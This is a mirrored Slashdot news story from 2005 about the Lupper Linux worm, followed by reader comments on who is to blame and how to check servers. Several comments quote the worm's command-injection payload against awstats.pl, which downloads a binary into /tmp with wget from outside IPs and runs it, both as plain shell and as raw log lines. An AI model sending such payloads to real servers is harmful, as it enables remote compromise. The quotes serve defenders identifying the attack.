Slashdot Mirror

← Back to Stories (view on slashdot.org)

Linux Lupper.Worm In the WIld

Posted by CmdrTaco on from the inching-its-way-around-the-net dept.

jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."

32 of 363 comments (clear)

  1. CONTINUE: by xtracto · · Score: 5, Funny

    Next, is a collection of messages telling that it is the fault of the system andministrators and not a problem of the Linux Distributions.

    p.s. BURN KARMA BURN!

    --
    Ubuntu is an African word meaning 'I can't configure Debian'
    1. Re:CONTINUE: by freeweed · · Score: 4, Insightful

      Well, actually, yes. Seeing as no Linux distibution installs and runs a webserver, plus one of the affected PHP utilities, by default, this one is squarely on the administrator's shoulders.

      Understanding just WHAT a vulnerability affects is the key to knowing who's responsible.

      --
      Endless arguments over trivial contradictions in books written by ignorant savages to explain thunder in the dark.
  2. Remarkably Useless page. by Short+Circuit · · Score: 5, Interesting
    First, what vulnerability does it exploit? I wasn't able to find any decent info on Linux/Slapper, and that's all it references.

    Second, how do you remove it? Quoth the page:
    Removal Instructions
    AVERT recommends to always use latest DATs and engine . This threat will be cleaned if you have this combination.

    Additional Windows ME/XP removal considerations

    --
    tasks(723) drafts(105) languages(484) examples(29106)
    1. Re:Remarkably Useless page. by gowen · · Score: 5, Informative
      According to ZDNet/Symantec
      "The worm exploits three vulnerabilities to propagate: the XML-RPC for PHP Remote Code Injection vulnerability; AWStats Rawlog Plugin Logfile Parameter Input Validation vulnerability; and Darryl Burgdorf's Webhints Remote Command Execution Vulnerability, according to Symantec's online description of the worm.

      The XML-RPC flaw affects blogging, wiki and content management software and was discovered earlier this year. Patches are available for most systems. AWStats is a log analyzer tool; a fix for the flaw has been available since February. Darryl Burgdorf's Webhints is a hint generation script; no fixes are available for the script, according to Symantec's DeepSight Alert Services."
      --
      Athletic Scholarships to universities make as much sense as academic scholarships to sports teams.
    2. Re:Remarkably Useless page. by tomhudson · · Score: 4, Insightful

      More alarmist shit (and old news at tht - The Reg reported this last week).

      Some php scripts that have as much to do with linux as a vulnerability in, say, photoshop, has to do with xp.

      The anti-virus writers are publicity whores looking to sensationalize their product, because in a few years nobody will be using them (Windows users will be stuck with the "free" verison from Microsoft, and BSD/OSX/Linux users don't need an anti-virus.

    3. Re:Remarkably Useless page. by harlows_monkeys · · Score: 4, Informative
      More alarmist shit (and old news at tht - The Reg reported this last week)

      My web server logs for my home machine are full of attempts to exploit these holes, coming from a large number of IP addresses.

      This indicates that this is indeed in the wild, and active, and spreading.

      Thus, it is not alarmist shit.

    4. Re:Remarkably Useless page. by tomhudson · · Score: 4, Insightful

      The key word is "attempts".

      Hey, look through your logs - you'll also see slapper in there, and code red, and all sorts of other stuff - but if it doesn't affect you, why give a shit?

      The number of affected machines is going to be VERY low. Fixes for one of the flaws have been out since February. My distro updates itself every couple of days. I'm not worried.

      Now:

      1. If you haven't updated your machine in years
      2. If you have those particular scripts installed
      3. If you allow files in /tmp to be run by processes from user "nobody"

      ... that's a LOT of ifs ...

      In other words, nothing to see here but more antivirus vendor fud.

    5. Re:Remarkably Useless page. by tomhudson · · Score: 4, Funny

      I'll tell you what, anyone wants some practice exploiting the hole, here's the IP address of a vulnerable machine to practice on: http://127.0.0.1/

      Knock yourselves out :-)

    6. Re:Remarkably Useless page. by Macrobat · · Score: 4, Funny

      You know, if you link to a porn site, you could at least warn us.

      --
      "Hardly used" will not fetch you a better price for your brain.
    7. Re:Remarkably Useless page. by budgenator · · Score: 4, Insightful

      step one go to securityfocus and update all of the applications listed on your system.
      Symptoms
      Presence of the following file:
      * /tmp/lupii
      One of the following ports are listening:
              * UDP 7111
              * UDP 7222
      so running su -c"netstat --listening --extend --program" tells you if its even running by listing what listening to any port such as UDP 7111 7222
      then it would be easy to
      su -c"kill -9 pid-of-lupii" su -c"rm /tmp/lupii" su -c"touch tmp/lupii"

      the worm appearent does this
      echo '_begin_';echo `cd /tmp;wget xx.xx.193.244/lupii;chmod +x lupii;./lupii xx.xx.193.244 `;echo '_end_';exit;/*
      so unless your server has a vulnerability that allows privailige escalation from nobody its stuck in tmp directories or possibly in your html directories.

      --
      Apocalypse Cancelled, Sorry, No Ticket Refunds
  3. PHP exploit, not directly a linux problem? by Anonymous Coward · · Score: 5, Insightful

    Seems kind of wrong to name it exclusively a linux problem.

    1. Re:PHP exploit, not directly a linux problem? by mysqlrocks · · Score: 5, Informative

      Calling it a PHP exploit would be wrong as well. It's an exploit of specific applications written in PHP (AWStats and Drupal from what I could tell).

      --
      Bradley Holt
  4. if it attacks PHP cross-platform... by frankie · · Score: 4, Insightful

    ...then it's a PHP/*nix worm, not Linux specifically.

    Heck there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable.

  5. Sadly a preview of things to come because... by Assmasher · · Score: 5, Insightful

    ...Linux is more and more popular with corporations holding valuable and important data.

    Success is a double-edged sword. ;)

    --
    Loading...
  6. Complete infection by soren.harward · · Score: 5, Funny

    All sysadmins who are still running this insecure setup are advised to patch your systems immediately. Yes, all fourteen of you.

  7. Conditions for infection... by xutopia · · Score: 4, Insightful

    "If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed." I'm thinking this is funny as hell. How many people configure apache this way?

    1. Re:Conditions for infection... by maxwell+demon · · Score: 5, Funny

      Hey, I've found a way to write a true Linux worm! It can infect all Linux computers which have a user named "wormhole" with password "unsafe", and have a suid-root copy of bash installed at /bin/rootbash which is executable by user "wormhole". Ah, and of course the user "wormhole" must be able to remote login through either rlogin or ssh with password authentication enabled. To spread, the worm also needs the file /etc/wormspreadrc, which must contain a list of other vulnerable computers, one hostname or IP number per line.

      SCNR

      --
      The Tao of math: The numbers you can count are not the real numbers.
    2. Re:Conditions for infection... by smoking2000 · · Score: 5, Informative
      The command it runs is:
      |echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen 216.102.212.115;echo YYY;echo|
      It is passed to awstats.pl in a request like:
      GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bc hmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e 212%2e115;echo%20YYY;echo| HTTP/1.1
      There are also POST request to xmlrpc.php pages, like:
      POST /drupal/xmlrpc.php HTTP/1.1
      So if you have /tmp mounted noexec this should not be a problem.
  8. Before all teh MSFT fanboys jump on this, by Anonymous Coward · · Score: 5, Funny

    Paraphrased from the virus description;

    IF you run a specific kernel version with some special module
    AND you run one of a couple specific versions of one package not installed by default
    AND you have a very "generic" config on that package
    AND you have some plugins enabled, but not configured for security
    AND you are on a world routable IP address
    AND you have some specific vulnerable scripts,

    THEN you might need to take a look at if you are at risk.

    Paraphrased from the virus description of most MSFT worms:

    IF you run an MSFT operating system
    AND you havent reformated your HDD in the lsat hour

    THEN its time to pucker up and kiss the sucker goodbye..

    -GenTimJS

  9. Re:How can we get some free press? by jellomizer · · Score: 4, Insightful

    Because it seems to only effect Linux and BSD systems (With a different worm). Other systems running PHP are not effected. So yes it is a linux worm. Like many of the Windows worms are not Windows Worms, but IE or OutLook Worms.

    --
    If something is so important that you feel the need to post it on the internet... It probably isn't that important.
  10. Too many ifs by SolitaryMan · · Score: 5, Interesting

    If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment ...

    which in practice means that your admin have died a couple of years ago but was never replaced.

    --
    May Peace Prevail On Earth
  11. Short of detail by QuaintRealist · · Score: 4, Informative

    So here is some, shamelessly cribbed from e-week. The worm actually attemts to attack three different web services:

    "The XML-RPC hole commonly exists in blogging and Wiki programs. There are now fixes available for this hole for most systems.

    AWStats is a popular, open-source log-file analyzer. Only servers which run AWStats 5.0 to 6.3 can be attacked. Versions 6.4, which came out in March, and higher are immune.

    Finally, Webhints is an older script program that's designed to set up and maintain a "Hint (Quote/Tip/Joke/Whatever) of the Day" page. Version 1.3 is vulnerable to attack. There is, at this time, no known fix for the program. "

    This still does not tell me which blogging/wiki programs are affected, only theat "most" have fixes - more info, anyone?

    --
    Using plain ol' text since 1968
  12. Does it look like this? by Mabonus · · Score: 5, Informative

    I just noticed this today, and from what I've heard here it sounds a likely candidate. IP addresses obscured for politeness.

    193.166.84 - - [04/Nov/2005:15:10:10 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193 %2e244;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    193.166.84 - - [04/Nov/2005:15:10:12 -0700] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd %20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3b chmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e19 3%2e244;echo%20YYY;echo| HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    193.166.84 - - [04/Nov/2005:15:10:14 -0700] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193 %2e244;echo%20YYY;echo| HTTP/1.1" 401 3787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    .
    .
    .
    193.166.84 - - [04/Nov/2005:15:10:31 -0700] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    193.166.84 - - [04/Nov/2005:15:10:33 -0700] "POST /blog/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    193.166.84 - - [04/Nov/2005:15:10:34 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    .
    .
    .
    For 60 hits.

  13. I'm not worried... by PoprocksCk · · Score: 5, Funny

    I doubt I'll have the libraries required to run this worm.

  14. Re:How can we get some free press? by sqlrob · · Score: 5, Insightful

    IE Worm = Windows worm.

    Remember, IE is integrated into the OS according to MS, therefore it is a Windows worm.

  15. Other links by AndroidCat · · Score: 4, Informative

    Security Focus eWeek CNet

    --
    One line blog. I hear that they're called Twitters now.
  16. Gnu! by rabel · · Score: 4, Funny

    That's Gnu/Linux worm to you, you insensitive clod!

  17. clearly a violation by FudRucker · · Score: 4, Funny

    if this worm does not include the sourcecode with every computer it infects it is violating the terms and conditions of the GNU/GPL

    --
    Politics is Treachery, Religion is Brainwashing
  18. Re:Linux/BSD only by mysqlrocks · · Score: 4, Insightful

    Seriously, though; isn't everyone fairly aware that PHP ain't that secure?

    No, PHP is secure. Some applications written in PHP are insecure. Programmers can introduce security vulnerabilities in any language. Bad programming is not language specific.

    --
    Bradley Holt
  19. It's not Windows by max+born · · Score: 5, Informative

    From the Security Focus article: Affected systems will need to be wiped and have the OS reinstalled, in most cases.

    Apche usually runs as user nobody with very limited privileges. I doubt you'd need to wipe and reinstall the OS. That's why lupper runs in /tmp.

  20. AWStats is a PHP application? by smartfart · · Score: 4, Informative

    Um, AWStats isn't written in PHP, but in Perl. This isn't a PHP worm, it's a CGI exploit which happens to target PHP apps, plus the occasional Perl app.

    --
    Need a Linux consultant in New Orleans?
  21. You're wrong. by khasim · · Score: 4, Insightful
    It will come up because it is true.
    No. It will keep coming up because people who don't understand security will keep bringing it up.

    There is a reason that more homes are robbed than banks, even though the banks have far more money in them than the homes do.

    The banks have better security than the homes do. So, even though more people go into a bank every day than go into your home, and the bank keeps lots more money in it than you keep in your home, because of the security, the bank is far less likely to be successfully robbed than your home.
    As for the worm, I didn't say it was a flaw in Linux, I was merely pointing out that security issues that affect Linux systems will rise as the success of Linux rises.
    That's what you believe. Yet my bank example shows that popularity has nothing to do with security.
    Maybe you should mod that as 'master of the obvious', but it doesn't make it any less accurate.
    That is because your statement is as inaccurate as possible already.

    By your "logic", banks would be robbed far more often than homes or cars or people because they are more popular.

    And security is why this worm will not do much damage.
    http://securityresponse.symantec.com/avcenter/venc /data/linux.plupii.html

    Look for "Number of Infections: 0-49".

    Oooooh! Scary! All those millions of Linux sites out there and fewer than 50 have been infected! Ooooooh!

    What's that? "Number of Sites: 0-2"?

    That means that fewer than 3 sites have been infected? Out of all of the Linux installations out there?

    Yeah, "security issues" will certainly be a problem as more people use Linux. I feel really bad for those 2 sites (or less) that were hit by this. Yep. It's a real threat.